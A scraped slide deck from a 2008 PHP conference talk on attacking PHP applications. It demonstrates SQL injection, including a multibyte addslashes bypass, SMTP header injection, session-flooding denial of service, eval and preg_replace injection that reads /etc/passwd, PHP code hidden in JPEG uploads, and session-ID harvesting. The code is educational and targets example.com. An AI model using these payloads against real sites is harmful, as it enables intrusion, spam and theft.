Exploiting Php With Php

38,014 views
37,739 views

Published on

Arpad Ray's PHPNW08 slides:

Looking at websites from the perspective of potential attackers is a useful technique not only for security professionals.
This talk demonstrates how to use simple PHP scripts to exploit many common security holes in PHP applications, hopefully giving developers a deeper understanding of what it is they are protecting against.

* Getting around common precautions against SQL injection
* Free spam with SMTP injection
* Making a malicious website to exploit PHP sessions
* The holes every attacker hopes for
* Making use of a newly exploited website

Published in: Technology
0 Comments
10 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total views
38,014
On SlideShare
0
From Embeds
0
Number of Embeds
92
Actions
Shares
0
Downloads
219
Comments
0
Likes
10
Embeds 0
No embeds

No notes for slide

Exploiting Php With Php

  1. 1. Exploiting PHP with PHP Arpad Ray @ PHPNW08
  2. 2. Why use PHP for this? <ul><li>We already know how to write PHP </li></ul>
  3. 3. Why use PHP for this? <ul><li>We already know how to write PHP </li></ul><ul><li>Can use directly in test scripts </li></ul>
  4. 4. Why use PHP for this? <ul><li>We already know how to write PHP </li></ul><ul><li>Can use directly in test scripts </li></ul><ul><li>PHP provides everything we need </li></ul>
  5. 5. Why use PHP for this? <ul><li>We already know how to write PHP </li></ul><ul><li>Can use directly in test scripts </li></ul><ul><li>PHP provides everything we need </li></ul><ul><li>Writing PHP can be very quick </li></ul>
  6. 6. Why use PHP for this? <ul><li>We already know how to write PHP </li></ul><ul><li>Can use directly in test scripts </li></ul><ul><li>PHP provides everything we need </li></ul><ul><li>Writing PHP can be very quick </li></ul><ul><li>Can efficiently re-use and combine attacks </li></ul>
  7. 7. SQL injection <ul><li>Probably the first attack most PHP developers hear of </li></ul>
  8. 8. SQL injection <ul><li>$q = &quot;SELECT * FROM foobar WHERE id = $_GET[id]&quot;; </li></ul>
  9. 9. SQL injection <ul><li>$q = &quot;SELECT * FROM foobar WHERE id = $_GET[id]&quot;; </li></ul><ul><li>index.php?id=1 OR 1=1 $_GET['id'] = '1 OR 1=1'; </li></ul>
  10. 10. SQL injection <ul><li>$q = &quot;SELECT * FROM foobar WHERE id = $_GET[id]&quot;; </li></ul><ul><li>index.php?id=1 OR 1=1 $_GET['id'] = '1 OR 1=1'; </li></ul><ul><li>$q = &quot;SELECT * FROM foobar WHERE id = 1 OR 1=1 &quot;; </li></ul>
  11. 11. SQL injection <ul><li>$q = &quot;SELECT * FROM foobar WHERE id = ' $_GET[id] ' &quot;; </li></ul>
  12. 12. SQL injection <ul><li>$q = &quot;SELECT * FROM foobar WHERE id = ' $_GET[id] ' &quot;; </li></ul><ul><li>index.php?id=' OR ''=' $_GET['id'] = “' OR ''='”; </li></ul>
  13. 13. SQL injection <ul><li>$q = &quot;SELECT * FROM foobar WHERE id = ' $_GET[id] ' &quot;; </li></ul><ul><li>index.php?id=' OR ''=' $_GET['id'] = “' OR ''='”; </li></ul><ul><li>$q = &quot;SELECT * FROM foobar WHERE id = ' ' OR ''=' ' &quot;; </li></ul>
  14. 14. SQL injection <ul><li>$q = &quot;SELECT * FROM foobar WHERE id = ' $_POST[id] ' &quot;; </li></ul>
  15. 15. SQL injection <ul><li>$q = &quot;SELECT * FROM foobar WHERE id = $_POST[id]&quot;; </li></ul><ul><li><form method=”post” action=” http://example.com/foo.php ”> </li></ul><ul><li><input type=”hidden” name=”id” value=”1 OR 1=1” /> <input type=”submit” /> </form> </li></ul>
  16. 16. SQL injection <ul><li>$q = &quot;SELECT * FROM foobar WHERE id = $_POST[id]&quot;; </li></ul><ul><li>$context = stream_context_create(array('http' => array( 'method' => 'post' 'content' => 'id=1 OR 1=1' ))); file_get_contents(' http://example.com/foo.php ', false, $context); </li></ul>
  17. 17. SQL injection <ul><li>$q = 'SELECT * FROM foobar WHERE id = ' . addslashes($id); </li></ul>
  18. 18. addslashes()‏ <ul><li>$id = addslashes($_POST['id']); $q = &quot;SELECT * FROM foobar WHERE id = ' $id ' &quot;; </li></ul><ul><li>$_POST['id'] = “' OR ''='”; </li></ul><ul><li>$q = &quot;SELECT * FROM foobar WHERE id = '' OR ''='' &quot;; </li></ul>
  19. 19. addslashes()‏ <ul><li>Getting around that pesky backslash </li></ul>
  20. 20. addslashes()‏ <ul><li>Getting around that pesky backslash </li></ul><ul><li>Multi-byte character attacks </li></ul>
  21. 21. addslashes()‏ <ul><li>Getting around that pesky backslash </li></ul><ul><li>Multi-byte character attacks </li></ul><ul><li>Swallow the backslash with a multi-byte character ending with that byte </li></ul>
  22. 22. addslashes()‏ <ul><li>Getting around that pesky backslash </li></ul><ul><li>Multi-byte character attacks </li></ul><ul><li>Swallow the backslash with a multi-byte character ending with that byte </li></ul><ul><li><start of mb character><single quote> // apply addslashes() <mb character><single quote> </li></ul>
  23. 23. addslashes()‏ <ul><li>$mbCharacter = &quot;xBFx5C&quot;; $quote = substr($mbCharacter, 0, -1) . '''; </li></ul>
  24. 24. addslashes()‏ <ul><li>$mbCharacter = &quot;xBFx5C&quot;; $quote = substr($mbCharacter, 0, -1) . '''; $id = &quot; $quote OR $quote$quote = $quote &quot;; $context = stream_context_create(array('http' => array( 'method' => 'post' 'content' => http_build_query(array('id' => $id)) ))); file_get_contents('http://example.com/foo.php', false, $context); </li></ul><ul><li>$q = &quot;SELECT * FROM foobar WHERE id = ' ?' OR '?'='? ' &quot;; </li></ul>
  25. 25. addslashes()‏ <ul><li>$mbCharacter = &quot;xBFx5C&quot;; $quote = substr($mbCharacter, 0, -1) . '''; $id = &quot; $quote OR 1=1 /* &quot;; $context = stream_context_create(array('http' => array( 'method' => 'post' 'content' => http_build_query(array('id' => $id)) ))); file_get_contents('http://example.com/foo.php', false, $context); </li></ul><ul><li>$q = &quot;SELECT * FROM foobar WHERE id = ' ?' OR 1=1 /* ' &quot;; </li></ul>
  26. 26. magic_quotes_gpc <ul><li>Uses addslashes() so escaping is not secure </li></ul>
  27. 27. magic_quotes_gpc <ul><li>Uses addslashes() so escaping is not secure </li></ul><ul><li>Fosters complacency </li></ul>
  28. 28. magic_quotes_gpc <ul><li>Uses addslashes() so escaping is not secure </li></ul><ul><li>Fosters complacency </li></ul><ul><li>Applications using magic quotes are much harder to make truly portable </li></ul>
  29. 29. magic_quotes_gpc <ul><li>Uses addslashes() so escaping is not secure </li></ul><ul><li>Fosters complacency </li></ul><ul><li>Applications using magic quotes are much harder to make truly portable </li></ul><ul><li>Inconsistencies between PHP versions </li></ul>
  30. 30. magic_quotes_gpc <ul><li>$context = stream_context_create(array('http' => array( 'user_agent' => $foo ))); </li></ul><ul><li>$context = stream_context_create(array('http' => array( 'method' => 'get' 'header' => 'X-Foo: ' . $foo ))); </li></ul>
  31. 31. magic_quotes_gpc <ul><li>? scalar'1=foo& array'1[scalar'2]=foo& array'1[array'2][scalar'3]=foo </li></ul>
  32. 32. magic_quotes_gpc <ul><li>Expected result: </li></ul><ul><li>Array ( [scalar'1] => foo [array'1] => Array ( [scalar'2] => foo [array'2] => Array ( [scalar'3] => foo ) ) )‏ </li></ul>
  33. 33. magic_quotes_gpc <ul><li>PHP 4.3.3 </li></ul><ul><li>Array ( [ scalar'1 ] => foo [ array'1 ] => Array ( [ scalar'2 ] => foo [array'2] => Array ( [ scalar'3 ] => foo ) ) )‏ </li></ul>
  34. 34. magic_quotes_gpc <ul><li>PHP 4.4.0 </li></ul><ul><li>Array ( [ scalar'1 ] => foo [ array'1 ] => Array ( [ scalar'2 ] => foo [array'2] => Array ( [ scalar'3 ] => foo ) ) )‏ </li></ul>
  35. 35. magic_quotes_gpc <ul><li>PHP 5.0.0 (OFF)‏ </li></ul><ul><li>Array ( [scalar'1] => foo [array'1] => Array ( [scalar'2] => foo [array'2] => Array ( [scalar'3] => foo ) ) )‏ </li></ul>
  36. 36. magic_quotes_gpc <ul><li>PHP 5.2.2 </li></ul><ul><li>Array ( [scalar'1] => foo [array'1] => Array ( [scalar'2] => foo [array'2] => Array ( [scalar'3] => foo ) ) )‏ </li></ul>
  37. 37. magic_quotes_gpc <ul><li>There are also problems disabling magic_quotes_gpc </li></ul>
  38. 38. magic_quotes_gpc <ul><li>There are also problems disabling magic_quotes_gpc </li></ul><ul><li>function stripslashes_deep($value) { $value = is_array($value) ? array_map('stripslashes_deep', $value) : stripslashes($value); return $value; } </li></ul>
  39. 39. magic_quotes_gpc <ul><li>There are also problems disabling magic_quotes_gpc </li></ul><ul><li>Instead of passing id=1 we can pass: 'id' . str_repeat('[]', 1000) . '=1' </li></ul><ul><li>We can trivially force the web server to do a lot of unnecessary work </li></ul>
  40. 40. Denial of Service <ul><li>Failure to release resources </li></ul>
  41. 41. Denial of Service <ul><li>Failure to release resources </li></ul><ul><li>Writing user data to disk </li></ul>
  42. 42. Denial of Service <ul><li>function fill_sessions($url, $num = 1000) { $context = stream_context_create(array( 'http' => array( 'method' => 'HEAD' ) )); for ($i = $num; $i--;) { file_get_contents($url, false, $context); } } </li></ul>
  43. 43. Denial of Service <ul><li>Failure to release resources </li></ul><ul><li>Writing user data to disk </li></ul><ul><li>Locking customer accounts </li></ul>
  44. 44. SMTP injection
  45. 45. SMTP injection <ul><li>$to = 'foobar@example.com'; </li></ul><ul><li>$subject = $_POST['subject']; </li></ul><ul><li>$from = $_POST['from']; </li></ul><ul><li>mail($to, $subject, 'From: ' . $from); </li></ul>
  46. 46. SMTP injection <ul><li>$context = stream_context_create(array('http' => array( </li></ul><ul><li>'method' => 'post' </li></ul><ul><li>'content' => http_build_query(array( </li></ul><ul><li>'subject' => &quot;foo Cc: target@example.com&quot;, </li></ul><ul><li>'from' => &quot;from@example.com Cc: target@example.com&quot; </li></ul><ul><li>))‏ </li></ul><ul><li>))); </li></ul>
  47. 47. SMTP injection <ul><li>Variable mail address </li></ul>
  48. 48. SMTP injection <ul><li>Variable mail address </li></ul><ul><li>Sanitisation </li></ul>
  49. 49. SMTP injection <ul><li>Variable mail address </li></ul><ul><li>Sanitisation </li></ul><ul><li>Validation </li></ul>
  50. 50. SMTP injection <ul><li>Variable mail address </li></ul><ul><li>Sanitisation </li></ul><ul><li>Validation </li></ul><ul><li>/^[^@]+@(?:w+.)+w{2,6}$/ </li></ul>
  51. 51. Hot vulnerabilities <ul><li>Direct eval() injection </li></ul>
  52. 52. Hot vulnerabilities <ul><li>Direct eval() injection </li></ul><ul><li>class Foo { function Foo() { $a = func_get_args(); print_r($a); } } </li></ul><ul><li>eval('$foo = new Foo(' . implode(',', $args) . ');'); </li></ul>
  53. 53. Hot vulnerabilities <ul><li>Direct eval() injection </li></ul><ul><li>$args[0] = 'readfile(“/etc/passed”)'; </li></ul>
  54. 54. Hot vulnerabilities <ul><li>preg_replace() using /e modifier </li></ul><ul><li>$s = '$-42 dollars'; </li></ul><ul><li>preg_replace('/$(.*?) dollars/e', 'abs($1)', $s)‏ </li></ul><ul><li>$s = '42'; </li></ul>
  55. 55. Hot vulnerabilities <ul><li>preg_replace() using /e modifier </li></ul><ul><li>$s = '$1).foobar().abs(1 dollars'; </li></ul><ul><li>preg_replace('/$(.*?) dollars/e', 'abs($1)', $s)‏ </li></ul><ul><li>$s = '4242'; </li></ul>
  56. 56. Hot vulnerabilities <ul><li>preg_replace() using /e modifier </li></ul><ul><li>$s = '$1).readfile(chr(47).chr(101)...abs(1 dollars'; </li></ul><ul><li>preg_replace('/$(.*?) dollars/e', 'abs($1)', $s)‏ </li></ul><ul><li>$s = '4242'; </li></ul>
  57. 57. Hot vulnerabilities <ul><li>Variable in include() call </li></ul><ul><li>$page = $_GET['page']; include $page; </li></ul>
  58. 58. Hot vulnerabilities <ul><li>Direct eval() injection </li></ul><ul><li>preg_replace() using /e modifier </li></ul><ul><li>Variable in include() call </li></ul><ul><li>Uploading PHP files </li></ul>
  59. 59. Hot vulnerabilities <ul><li>Uploading PHP files </li></ul><ul><ul><li>Check file extension </li></ul></ul><ul><ul><li>Check uploaded MIME type </li></ul></ul><ul><ul><li>Check file MIME type </li></ul></ul><ul><ul><li>Move outside of web root </li></ul></ul>
  60. 60. Hot vulnerabilities <ul><li>$script = <<<EOT <?php var_dump('hello world!'); EOT; $jpeg = '/path/to/some_valid.jpg'; $fp = fopen($jpeg, 'ab'); fwrite($fp, $script); fclose($fp); </li></ul>
  61. 61. Hot vulnerabilities <ul><li>Direct eval() injection </li></ul><ul><li>preg_replace() using /e modifier </li></ul><ul><li>Variable in include() call </li></ul><ul><li>Uploading PHP files </li></ul>
  62. 62. Hot vulnerabilities <ul><li>Direct eval() injection </li></ul><ul><li>preg_replace() using /e modifier </li></ul><ul><li>Variable in include() call </li></ul><ul><li>Uploading PHP files </li></ul><ul><li>Shell injection </li></ul>
  63. 63. Making an evil website <ul><li>HTTP requests can give us lots of interesting information </li></ul><ul><li>PHPSESSID = bingo </li></ul>
  64. 64. Making an evil website <ul><li>if (isset($_SESSION['HTTP_REFERER'])) { if (preg_match(' / PHPSESSID=([^=&]+) /xi', $_SESSION['HTTP_REFERER'])); } </li></ul>
  65. 65. Making an evil website <ul><li>if (isset($_SESSION['HTTP_REFERER'])) { if (preg_match(' / PHPSESSID=([^=&]+) | </li></ul><ul><li>(?<==)([a-fd]{32}|[a-fd]{40}) /xi', $_SESSION['HTTP_REFERER'])); } </li></ul>
  66. 66. Making use of victims <ul><li>File scan </li></ul>
  67. 67. Making use of victims <ul><li>File scan </li></ul><ul><li>$dir = new RecursiveIteratorIterator( </li></ul><ul><li>new RecursiveDirectoryIterator('/', true)‏ </li></ul><ul><li>); </li></ul><ul><li>foreach ($dir as $file) { </li></ul><ul><li>echo $file->getPathname(), &quot; &quot;; </li></ul><ul><li>} </li></ul>
  68. 68. Making use of victims <ul><li>File scan </li></ul><ul><li>Subverting existing files </li></ul>
  69. 69. Making use of victims <ul><li>File scan </li></ul><ul><li>Subverting existing files </li></ul><ul><li>Escalate privileges, take over machine </li></ul>
  70. 70. Making use of victims <ul><li>File scan </li></ul><ul><li>Subverting existing files </li></ul><ul><li>Escalate privileges, take over machine </li></ul><ul><li>botnet.php </li></ul>
  71. 71. Questions?

×